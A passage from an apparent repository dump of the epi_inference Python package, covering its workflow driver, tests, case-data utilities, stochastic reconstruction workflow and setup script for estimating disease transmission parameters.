'./baseline/recon_stoch_countydata1_all_39847938.json')\n outputdf, golddf = compare_json('./output/recon_stoch_countydata1_12011.json', './baseline/recon_stoch_countydata1_12011.json')\n \n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_stoch_countydata1_all_38479387.json')\n os.remove('./output/recon_stoch_countydata1_all_38479387_meta.yml')\n os.remove('./output/recon_stoch_countydata1_all_39847938.json')\n os.remove('./output/recon_stoch_countydata1_all_39847938_meta.yml')\n os.remove('./output/recon_stoch_countydata1_12011.json')\n os.remove('./output/recon_stoch_countydata1_12011_meta.yml')\n\n def test_recon_json2csv(self):\n args = Options()\n args.block = 'json2csv'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_38479387_flatten.csv', './baseline/recon_stoch_countydata1_all_38479387_flatten.csv')\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_flatten.csv', './baseline/recon_stoch_countydata1_all_flatten.csv')\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_38479387_narrow.csv', './baseline/recon_stoch_countydata1_all_38479387_narrow.csv')\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_narrow.csv', './baseline/recon_stoch_countydata1_all_narrow.csv')\n \n df_flatten = pd.read_csv('./output/recon_stoch_countydata1_all_38479387_flatten.csv')\n df_narrow = pd.read_csv('./output/recon_stoch_countydata1_all_38479387_narrow.csv')\n\n assert(df_narrow.shape[1] == (df_flatten.shape[1]-8+2))\n assert(df_narrow.shape[0] == 8*df_flatten.shape[0])\n assert(df_narrow.size == (8*df_flatten.shape[0]) * (df_flatten.shape[1]-8+2))\n\n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_stoch_countydata1_all_38479387_flatten.csv')\n os.remove('./output/recon_stoch_countydata1_all_flatten.csv')\n os.remove('./output/recon_stoch_countydata1_all_38479387_narrow.csv')\n os.remove('./output/recon_stoch_countydata1_all_narrow.csv')\n \n def test_recon_summary(self):\n args = Options()\n args.block = 'recon_summary'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_summary.csv', './baseline/recon_stoch_countydata1_all_summary.csv')\n \n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_stoch_countydata1_all_summary.csv')\n\n" }, { "alpha_fraction": 0.6023255586624146, "alphanum_fraction": 0.604044497013092, "avg_line_length": 38.71485900878906, "blob_id": "8ba080f6e16f464f4f35119a17702c095724a6e9", "content_id": "66423b3b48c7a73c8d3c48c1c82ec70b021c902b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9890, "license_type": "no_license", "max_line_length": 150, "num_lines": 249, "path": "/epi_inference/engine/driver.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['driver', 'run', 'run_block_multiworkflow']\n\nimport os\nimport sys\nimport datetime\nimport argparse\nimport yaml\nimport pprint\nfrom pyutilib.misc import Options, timing\nimport pyutilib.services\ntry:\n import joblib\n joblib_available = True\nexcept:\n joblib_available = False\n\nfrom .task_registry import registered_tasks\nfrom .util import factorial_iterator, load_configfile\nfrom .config_parameters import set_config_parameters, get_config_parameters\nfrom .misc import save_metadata\n\nglobal_tempdir = None\n\ndef driver(tmpdir=None, command='unknown'):\n if os.environ.get('TMPDIR',tmpdir) is not None:\n _tmpdir = os.environ.get('TMPDIR',tmpdir)\n if not os.path.exists(_tmpdir):\n os.makedirs(_tmpdir)\n #os.environ['TMPDIR'] = tmpdir\n pyutilib.services.TempfileManager.tempdir = _tmpdir\n global global_tempdir\n global_tempdir = _tmpdir\n\n Parser = argparse.ArgumentParser(description='inference models')\n Parser.add_argument('-c', '--catch-errors', action='store_true', default=False,\n help='Catch exceptions')\n Parser.add_argument('-q', '--quiet', action='store_true', default=False,\n help='Suppress diagnostic')\n Parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbosity flag')\n Parser.add_argument('-P', '--parallelize-workflows', action='store_true', default=False,\n help='Parallelize the execution of all workflows. This option parallelizes all workflows and their factors.')\n Parser.add_argument('-p', '--parallelize-factors', action='store_true', default=False,\n help='Parallelize the execution of factors for each workflow if there are enough of them (>= MIN_PARALLEL_WORKFLOWS).')\n Parser.add_argument('--np', action='store', type=int, default=2,\n help='Number of processors used to parallelize workflows. (default=2)')\n Parser.add_argument('--min-parallel-workflows', action='store', type=int, default=2,\n help='Minimum number of workflows that are needed to use parallelization. (default=2)')\n Parser.add_argument('--help-workflows', action='store_true', default=False,\n help='Print all available workflows')\n Parser.add_argument('block', help='Name of block in the config file that will be executed', default=None)\n Parser.add_argument('config_file', help='YAML configuration file', default=None)\n #\n # Parse sys.argv\n #\n args = Parser.parse_args()\n if not args.quiet:\n timing.tic('Starting '+command)\n if args.catch_errors:\n run(args)\n else:\n try:\n run(args)\n except Exception as e:\n print(\"Error: \"+str(e))\n if not args.quiet:\n timing.toc('Finishing '+command)\n\n\ndef run_workflow(task, CONFIG, data, tempdir):\n if tempdir:\n pyutilib.services.TempfileManager.tempdir = tempdir\n print(\"\\nExecuting Workflow: \"+task.name)\n task.run( data, CONFIG )\n\n\ndef run_block_serial(workflow_blocks, args, config_parameters):\n #\n # Serially execute all workflows and their factors\n #\n tasks = registered_tasks()\n for cargs in workflow_blocks[args.block]:\n workflow = cargs.get('workflow', None)\n if workflow is None:\n print(\"WARNING: No workflow specified in '%s' block\" % args.block)\n continue\n if not 'verbose' in cargs:\n cargs['verbose'] = args.verbose\n #\n # Launch the task that is named by\n #\n if 'factors' in cargs:\n config_list = factorial_iterator(cargs['factors'], cargs, config_parameters)\n else:\n config_list = factorial_iterator({}, cargs, config_parameters)\n\n for CONFIG in config_list:\n workflow = CONFIG['workflow']\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n run_workflow(tasks[workflow], CONFIG, workflow_blocks, global_tempdir)\n\n\ndef run_block_parallel_factors(workflow_blocks, args, config_parameters):\n #\n # Serially execute all workflows, but parallelize the execution of workflow factors\n #\n tasks = registered_tasks()\n for cargs in workflow_blocks[args.block]:\n workflow = cargs.get('workflow', None)\n if workflow is None:\n print(\"WARNING: No workflow specified in '%s' block\" % args.block)\n continue\n if not 'verbose' in cargs:\n cargs['verbose'] = args.verbose\n #\n # Launch the task that is named by\n #\n if 'factors' in cargs:\n config_list = list(factorial_iterator(cargs['factors'], cargs, config_parameters))\n else:\n config_list = list(factorial_iterator({}, cargs, config_parameters))\n\n if len(config_list) >= args.min_parallel_workflows:\n # Parallel\n good_configs = []\n for CONFIG in config_list:\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n good_configs.append( CONFIG )\n with joblib.Parallel(n_jobs=args.np, verbose=args.verbose*10) as parallel:\n parallel( joblib.delayed(run_workflow)(tasks[CONFIG['workflow']], CONFIG, workflow_blocks, global_tempdir) for CONFIG in good_configs)\n else:\n # Serial\n for CONFIG in config_list:\n workflow = CONFIG['workflow']\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n run_workflow(tasks[workflow], CONFIG, workflow_blocks, global_tempdir)\n\ndef run_block_parallel_workflows(workflow_blocks, args, config_parameters):\n #\n # Parallelize execution of workflows and workflow factors\n #\n tasks = registered_tasks()\n workflows = []\n for cargs in workflow_blocks[args.block]:\n workflow = cargs.get('workflow', None)\n if workflow is None:\n print(\"WARNING: No workflow specified in '%s' block\" % args.block)\n continue\n if not 'verbose' in cargs:\n cargs['verbose'] = args.verbose\n #\n # Launch the task that is named by\n #\n if 'factors' in cargs:\n config_list = list(factorial_iterator(cargs['factors'], cargs, config_parameters))\n else:\n config_list = factorial_iterator({}, cargs, config_parameters)\n\n for CONFIG in config_list:\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n workflows.append( CONFIG )\n\n if len(workflows) >= args.min_parallel_workflows:\n # Parallel\n with joblib.Parallel(n_jobs=args.np, verbose=args.verbose*10) as parallel:\n parallel( joblib.delayed(run_workflow)(tasks[CONFIG['workflow']], CONFIG, workflow_blocks, global_tempdir) for CONFIG in workflows)\n else:\n # Serial\n for CONFIG in workflows:\n workflow = CONFIG['workflow']\n run_workflow(tasks[workflow], CONFIG, workflow_blocks, global_tempdir)\n\n\ndef run_block_multiworkflow(CONFIG, warnings, config):\n for block in CONFIG['blocks']:\n np = int(CONFIG.get('num_processes',1))\n if np > 1:\n if CONFIG.get('parallel_workflows',False):\n args = Options(block=block,\n np=np,\n parallelize_workflow=True,\n verbose=CONFIG['verbose'],\n min_parallel_workflows=10)\n run_block_parallel_workflows(config, args, get_config_parameters())\n else:\n args = Options(block=block,\n np=np,\n parallelize_factors=True,\n verbose=CONFIG['verbose'],\n min_parallel_workflows=10)\n run_block_parallel_factors(config, args, get_config_parameters())\n else:\n args = Options(block=block, verbose=CONFIG['verbose'])\n run_block_serial(config, args, get_config_parameters())\n\n save_metadata(CONFIG, warnings)\n\n\ndef run(args):\n #\n #\n # Get help information\n #\n if args.help_workflows:\n tasks = registered_tasks()\n print(\"\")\n print(\"Available Workflows\")\n print(\"-------------------\")\n for t in sorted(tasks.keys()):\n print(t)\n print(\" \"+tasks[t].description)\n return\n #\n # Load the YAML configuration file\n #\n workflow_blocks = load_configfile(args.config_file)\n if args.verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(get_config_parameters())\n pp.pprint(workflow_blocks)\n print(\"\")\n #\n # Iterate over all workflow blocks for the specified subcommand\n #\n if not (args.block in workflow_blocks):\n print(\"WARNING: No workflow block '%s' specified\" % args.block)\n return\n\n if not joblib_available and (args.parallelize_workflows or args.parallelize_factors):\n print(\"ERROR: Cannot parallelize workflows. The 'joblib' packages is not installed.\")\n return\n\n if args.parallelize_workflows and args.np > 1:\n run_block_parallel_workflows(workflow_blocks, args, get_config_parameters())\n\n elif args.parallelize_factors and args.np > 1:\n run_block_parallel_factors(workflow_blocks, args, get_config_parameters())\n\n else:\n run_block_serial(workflow_blocks, args, get_config_parameters())\n\n" }, { "alpha_fraction": 0.7714285850524902, "alphanum_fraction": 0.7714285850524902, "avg_line_length": 19, "blob_id": "bd021a7a262af248dbd5a815db7c2610a26511b8", "content_id": "8fe8f691cd48d6e34329ef1393d8f079f605bd76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 27, "num_lines": 7, "path": "/epi_inference/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# The epi_inference package\n\nfrom . import engine\nfrom . import collect\nfrom . import formulations\nfrom . import workflow\nfrom . import viz\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 11, "blob_id": "fd9623354dc6864bdede729f67e0c2db13631e21", "content_id": "eab97bc4506a801e6909761e6538cb69d791a428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 35, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/R_utilities/test.R", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "require(MASS)\n\nprint('Hello Bill!')" }, { "alpha_fraction": 0.5224858522415161, "alphanum_fraction": 0.5240678191184998, "avg_line_length": 37.8070182800293, "blob_id": "c6b566597bb286152f70ac8486fbf553bb66bd15", "content_id": "93bc95050545f7c802e0b96294e017f0c88a1135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4425, "license_type": "no_license", "max_line_length": 104, "num_lines": 114, "path": "/epi_inference/ATTIC/collect.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import csv\nimport sys\nimport argparse\nimport yaml\nimport os.path\nimport shutil\nimport datetime\nimport pprint\nfrom .util import factorial_iterator\n\nfrom .load_results import load_df_expdata, load_df_casedata\n\n\ndef save_output(cargs, df, verbose, data=None):\n if verbose:\n print(\"Data Summary\")\n print(df)\n print(\"\")\n \n ofname = cargs[\"output\"]\n print(\"Writing file: \"+ofname)\n filedir = os.path.dirname(ofname)\n if filedir and not os.path.exists(filedir): # pragma: no cover\n os.makedirs(filedir)\n if verbose and os.path.exists(ofname): # pragma: no cover\n print(\" WARNING: over-writing file \"+ofname)\n df.to_csv(ofname, quoting=csv.QUOTE_NONNUMERIC)\n #\n if os.path.exists(os.path.join(cargs[\"dir\"], \"geodata.csv\")):\n shutil.copyfile(os.path.join(cargs[\"dir\"], \"geodata.csv\"), ofname[:-4]+\"_geodata.csv\") \n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cargs:\n metadata['configuration'][key] = cargs[key]\n if not data is None and len(data) > 0:\n metadata['simulation parameters'] = data\n dfile = ofname[:-4]+\"_meta.yml\"\n print(\"Writing file: \"+dfile)\n with open(dfile, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n\ndef run(args):\n #\n # Load the YAML configuration file\n #\n with open(args.config_file, 'r') as INPUT:\n try:\n config = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file\")\n print(exc)\n sys.exit(1)\n if args.verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(config)\n print(\"\")\n\n if 'expdata' in config:\n #\n # Process experimental data. We assume that data is organized\n # within a subdirectory in separate directories named 'exp<id>'.\n # See the epi_inference/examples/expdata directory structure for\n # an example.\n #\n cargs = config['expdata']\n for i in range(len(cargs)):\n if 'factors' in cargs[i]:\n config_list = factorial_iterator(cargs[i]['factors'], cargs[i])\n else:\n config_list = [cargs[i]]\n\n for CONFIG in config_list:\n df, data = load_df_expdata(expdir=CONFIG[\"dir\"],\n county=CONFIG[\"county\"],\n trial=CONFIG.get('trial',None),\n days_before_first=CONFIG.get(\"days_before_first\", None),\n days_after_first=CONFIG.get(\"days_after_first\",None),\n expnum=CONFIG[\"expnum\"])\n\n if df is None: # pragma: no cover\n print(\"ERROR: no experimental data loaded\")\n sys.exit(1)\n save_output(CONFIG, df, args.verbose, data=data)\n\n elif 'casedata' in config:\n #\n # Process county case data. We assume that data is organized within\n # a single directory, where each CSV file reports case data for a single\n # county. See the epi_inference/examples/countydata directory structure for\n # an example.\n #\n cargs = config['casedata']\n for i in range(len(cargs)):\n if 'factors' in cargs[i]:\n config_list = factorial_iterator(cargs[i]['factors'], cargs[i])\n else:\n config_list = [cargs[i]]\n\n for CONFIG in config_list:\n df = load_df_casedata(CONFIG[\"files\"],\n datadir=CONFIG[\"dir\"],\n datacol=CONFIG.get(\"column\", None),\n days_before_first=CONFIG.get(\"days_before_first\", None),\n days_after_first=CONFIG.get(\"days_after_first\",None))\n\n if df is None: # pragma: no cover\n print(\"ERROR: no case data loaded\")\n sys.exit(1)\n save_output(CONFIG, df, args.verbose)\n\n" }, { "alpha_fraction": 0.6194690465927124, "alphanum_fraction": 0.6194690465927124, "avg_line_length": 25.076923370361328, "blob_id": "ffb81f7991f89e54062ade47c75dd1b8733e3398", "content_id": "beb850d094a2f8ca4ba224ca904170df23f56889", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 339, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/epi_inference/epiinf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import os\nfrom . import workflow\nfrom epi_inference.engine.driver import driver\n \ndef main():\n if \"HOME\" in os.environ:\n tmpdir = os.path.join(os.environ[\"HOME\"],\".epiinf\",\"tmp\")\n else:\n tmpdir = os.path.join(os.getcwd(),\"epiinf_tmp\")\n driver(tmpdir=tmpdir, command='epiinf')\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.648134708404541, "alphanum_fraction": 0.6516472697257996, "avg_line_length": 46.99418640136719, "blob_id": "db217b78fdda33f27e43a80d7c604b07843f4e6d", "content_id": "088a845d335561c313e7f1a686602b9e607567cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8256, "license_type": "no_license", "max_line_length": 119, "num_lines": 172, "path": "/epi_inference/reconstruction/common.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "from datetime import datetime, timedelta\nimport numpy as np\nfrom pyutilib.misc.misc import Bunch\n\n\"\"\"\nThis module provides some common functions used for reconstruction\ncomputations.\n\"\"\"\n\"\"\"\n# draft of a decorator that forces named arguments\ndef force_keyword_args(func):\n def force_keyword_args_wrapper(func, *args, **kwargs):\n if len(args) != 0:\n raise SyntaxError('function {} accepts keyword arguments only'.format(str(func)))\n\n return func(**kwargs)\n return force_keyword_args_wrapper(func)\n\"\"\"\n\ndef reported_cases_from_cumulative(*, dates, cumulative_reported_cases):\n \"\"\"\n This function takes the cumulative reported cases (by day) and does\n the difference to return the number of reported cases within each day.\n It requires that the cumulative reported cases start at zero since\n the models in this module assume a fully suspectible population at\n the start.\n\n Parameters\n ----------\n dates : list of datetime objects\n This is the dates for each of the reported cases using a python datetime object.\n \n cumulative_reported_cases : list of numbers\n This is a list of the cumulative reported cases. The list must include\n all cases (i.e., start at zero) in order to be consistent with other model\n assumptions in the reconstruction module.\n \"\"\"\n if cumulative_reported_cases[0] != 0:\n # This is necessary since we assume that S0, E0, and I0 are all zero.\n # Therefore, we need to start well before the beginning of the\n # reported cases\n raise ValueError('reported_cases_from_cumulative: The first'\n ' data point in cumulative_reported_cases must'\n ' be zero. These procedures assume the data spans'\n ' the entire timeline.'\n )\n\n if len(cumulative_reported_cases) != len(dates):\n raise ValueError(\"The length of the dates list is not the same as the \"\n \"cumulative_reported_cases list\")\n \n cumul_rep_cases = cumulative_reported_cases\n reported_cases = [j-i for i,j in zip(cumul_rep_cases, cumul_rep_cases[1:])]\n assert len(reported_cases) == len(cumul_rep_cases)-1\n reported_cases_dates = dates[1:]\n assert len(reported_cases_dates) == len(dates)-1\n\n # sanity check - the cumulative reported cases should be non-decreasing\n # therefore, we should not have any negative reported cases\n if not all([c >= 0 for c in reported_cases]):\n raise ValueError('reported_cases_from_cumulative: Negative reported'\n ' cases detected for an interval. cumulative_reported_cases'\n ' must be a list of non-decreasing numbers.')\n \n return Bunch(dates=reported_cases_dates, values=reported_cases)\n\ndef df_reported_cases_from_cumulative(df_cumulative_reported_cases):\n \"\"\"\n This function takes the cumulative reported cases (by day) as a Pandas\n dataframe where each column is a different county (node) and just\n the difference to return a new dataframe with the number of reported\n cases within each day.\n\n It requires that the cumulative reported cases start for each county\n start at zero since the models in this module assume a fully suspectible population at\n the start.\n\n Parameters\n ----------\n df_cumulative_reported_cases : DataFrame\n This is a dataframe that contains cumulative reported cases. Each row\n corresponds to a different day, and each column is a different county (node).\n The index should be the 'date' column.\n The cumulative reported cases must all start at zero in order to be\n consistent with other model assumptions in the reconstruction module.\n \"\"\"\n first_row = df_cumulative_reported_cases.iloc[0]\n first_row = first_row.drop(['date'])\n if (first_row != 0).any():\n # This is necessary since we assume that S0, E0, and I0 are all zero.\n # Therefore, we need to start well before the beginning of the\n # reported cases\n raise ValueError('df_reported_cases_from_cumulative: The first'\n ' row for df_cumulative_reported_cases must'\n ' all be zero. These procedures assume the data spans'\n ' the entire timeline (from prior to the initial reported'\n ' case.'\n '\\nFirst row:\\n{}'.format(first_row)\n )\n\n df_reported_cases = df_cumulative_reported_cases.set_index('date')\n df_reported_cases = df_reported_cases.diff()\n df_reported_cases = df_reported_cases.drop(df_reported_cases.index[0])\n\n # sanity check - the cumulative reported cases should be non-decreasing\n # therefore, we should not have any negative reported cases\n if (df_reported_cases < 0).any(axis=None):\n raise ValueError('df_reported_cases_from_cumulative: Negative reported'\n ' cases detected for an interval. Columns in df_cumulative_reported_cases'\n ' must all be non-decreasing.')\n\n return df_reported_cases\n\ndef np_reported_cases_from_cumulative(*, dates, counties, cumulative_reported_cases):\n \"\"\"\n This function takes the cumulative reported cases (by day) and returns the\n new cases within each day.\n\n It requires that the cumulative reported cases start for each county\n start at zero since the models in this module assume a fully suspectible population at\n the start.\n\n Parameters\n ----------\n dates : numpy array of datetime objects\n The dates corresponding to the rows in the cumulative reported cases\n counties : numpy array of object (strings)\n The names of the counties (or nodes) corresponding to the columns in the\n cumulative reported cases\n cumulative_reported_cases : Numpy two-dimensional array\n This is a numpy array that contains cumulative reported cases. Each row\n corresponds to a different day, and each column is a different county (node).\n The cumulative reported cases must all start at zero in order to be\n consistent with other model assumptions in the reconstruction module. \n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n \n # check the sizes of the incoming data\n if len(dates) != cumulative_reported_cases.shape[0] or \\\n len(counties) != cumulative_reported_cases.shape[1]:\n raise ValueError('Dimension error in np_reported_cases_from_cumulative.'\n ' length of dates must be equal to the number of rows in'\n ' cumulative_reported_cases and length of counties '\n ' must be equal to the number of columns in'\n ' cumulative_reported_cases.'\n )\n\n if sum(cumulative_reported_cases[0,:]) > 0:\n # This is necessary since we assume that S0, E0, and I0 are all zero.\n # Therefore, we need to start well before the beginning of the\n # reported cases\n raise ValueError('np_reported_cases_from_cumulative: The first'\n ' row for cumulative_reported_cases must'\n ' all be zero. These procedures assume the data spans'\n ' the entire timeline (from prior to the initial reported'\n ' case.'\n '\\nFirst row:\\n{}'.format(list((c,v) for c,v in zip(counties,cumulative_reported_cases[0,:])))\n )\n\n np_reported_cases = np.diff(cumulative_reported_cases, axis=0)\n dates = dates[1:]\n\n # sanity check - the cumulative reported cases should be non-decreasing\n # therefore, we should not have any negative reported cases\n if np.any(np_reported_cases < 0):\n raise ValueError('df_reported_cases_from_cumulative: Negative reported'\n ' cases detected for an interval. Columns in df_cumulative_reported_cases'\n ' must all be non-decreasing.')\n\n return Bunch(dates=dates, counties=counties, values=np_reported_cases)\n\n" }, { "alpha_fraction": 0.6603325605392456, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 30.549999237060547, "blob_id": "57b85ff3cf8d8b8e5ced095decbff09124b1184f", "content_id": "7e122a2bed5d10ddf5c944d7485cdaf6095b8703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1263, "license_type": "no_license", "max_line_length": 74, "num_lines": 40, "path": "/setup.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "\"\"\"\nSetup for epi_inference package\n\"\"\"\n\nimport os\nfrom setuptools import setup, find_packages\n\nrequires=[ 'pyomo', 'pyyaml', 'recursive_diff' ]\n\nsetup(name=\"epi_inference\",\n version='1.0.dev0',\n maintainer='Carl D. Laird',\n maintainer_email='cdlaird@sandia.gov',\n platforms = [\"any\"],\n python_requires='>=3.6',\n description = 'Tools to perform inference for epidemiological models',\n long_description = \"\"\"\nThis package was developed to estimate disease transmission parameters\nassociated with epidemiology models. The package includes several\ninference approaches.\n\nThis package relies on the Pyomo modeling software. Pyomo and other\noptimization solvers need to be installed to use these inference methods.\n\"\"\",\n long_description_content_type='text/markdown',\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Natural Language :: English',\n 'Operating System :: Unix',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Scientific/Engineering :: Mathematics'],\n packages=find_packages(),\n keywords=['utility'],\n install_requires=requires,\n entry_points=\"\"\"\n [console_scripts]\n epiinf = epi_inference.epiinf:main\n \"\"\"\n )\n\n" }, { "alpha_fraction": 0.7684210538864136, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 22.75, "blob_id": "7d8f32fa2fb4703e29bbd27cc6b3681aa6070eee", "content_id": "5619f977401c0168d6b46163b100e963f69f47e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 45, "num_lines": 4, "path": "/epi_inference/workflow/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.workflow\n\nfrom . import Rtest_wf\nfrom . import inference_json2csv_by_county_wf\n" }, { "alpha_fraction": 0.6358894109725952, "alphanum_fraction": 0.6374543309211731, "avg_line_length": 32.622806549072266, "blob_id": "fd24e9045b45bc13f835f7a0da875f2fa8e0655e", "content_id": "7483041553efa1b41fd7661076d6d14007d066e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3834, "license_type": "no_license", "max_line_length": 294, "num_lines": 114, "path": "/epi_inference/reconstruction/recon_stochastic_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport datetime\n#import pandas as pd\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..collect.misc import load_collect\nfrom ..reconstruction.stochastic import stochastic_reconstruction\nfrom ..reconstruction.common import reported_cases_from_cumulative\n\n\ndef run_county(county, df, population, CONFIG, warnings):\n #\n # Initialize results dictionary\n #\n results = {'FIPS':county}\n for key, value in CONFIG.get('factor_levels',{}).items():\n if not key in results:\n results[key] = value\n #\n # Get the cumulative cases\n #\n cumulative_reported_cases = df[county].to_list()\n\n # reconstruct the states\n Cdates = [datetime.date.fromisoformat(day) for day in df.index.to_list()]\n reported_cases_per_day = \\\n reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases)\n\n # Setup arguments for stochastic_reconstruction\n args = {'dates':reported_cases_per_day.dates,\n 'reported_cases_per_day':reported_cases_per_day.values,\n 'population':population,\n 'n_steps_per_day':CONFIG['n_steps_per_day']}\n for option in ['reporting_delay_mean', 'reporting_delay_dev', 'reporting_multiplier', 'fixed_incubation', 'infectious_lower', 'infectious_upper', 'seed']:\n if option in CONFIG:\n args[option] = CONFIG[option]\n res = stochastic_reconstruction(**args)\n\n results['dates'] = res.dates\n results['transmissions'] = res.transmissions\n results['S'] = res.S\n results['E'] = res.E\n results['I1'] = res.I1\n results['I2'] = res.I2\n results['I3'] = res.I3\n results['R'] = res.R\n results['population'] = population\n results['orig_rep_cases'] = res.orig_rep_cases\n return results\n\n\ndef run(CONFIG, warnings):\n #\n # Load the population data\n #\n population_df = load_population(CONFIG['population_csv']['file'], CONFIG['population_csv']['index'])\n #\n # Load the case data \n #\n df = load_collect(CONFIG['input_csv'])\n #\n # Perform construction\n #\n results = {}\n if 'county' in CONFIG:\n counties = [CONFIG['county']]\n else:\n counties = df.keys()\n\n if CONFIG['verbose']:\n timing.tic()\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n results[t] = run_county(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings)\n if CONFIG['verbose']:\n timing.toc(\"Serial Execution\")\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass ReconstructionStochastic(Task):\n\n def __init__(self):\n Task.__init__(self, \"reconstruction_stochastic\",\n \"Perform stochastic compartment reconstruction.\")\n\n def validate(self, CONFIG):\n valid_options = set(['reporting_delay_mean', 'reporting_delay_dev', 'reporting_multiplier', 'fixed_incubation', 'infectious_lower', 'infectious_upper', 'seed', 'n_steps_per_day', 'population_csv', 'input_csv', 'county', 'output_json', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(ReconstructionStochastic())\n\n" }, { "alpha_fraction": 0.5954315662384033, "alphanum_fraction": 0.6136747002601624, "avg_line_length": 41.350650787353516, "blob_id": "3205d85caea29dee0655fb10f4fc7d777e6b9e46", "content_id": "9b3d7c7ed5d16f045fa6fa21e8ed37252192428e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6523, "license_type": "no_license", "max_line_length": 177, "num_lines": 154, "path": "/epi_inference/formulations/attic/multinode_decay_multibeta_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import assert_optimal_termination\nimport math\n\nfrom ..tseir_utils import compute_compartments_decay\n\n\ndef run_multinode_decay_multibeta_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_multinode_decay_multibeta_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n results = {}\n for i in m.beta:\n results['est_beta_week'+str(i)] = value(m.beta[i])\n return results\n\ndef create_inference_formulation_multinode_decay_multibeta_lsq(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay\n model with 3 I compartments. 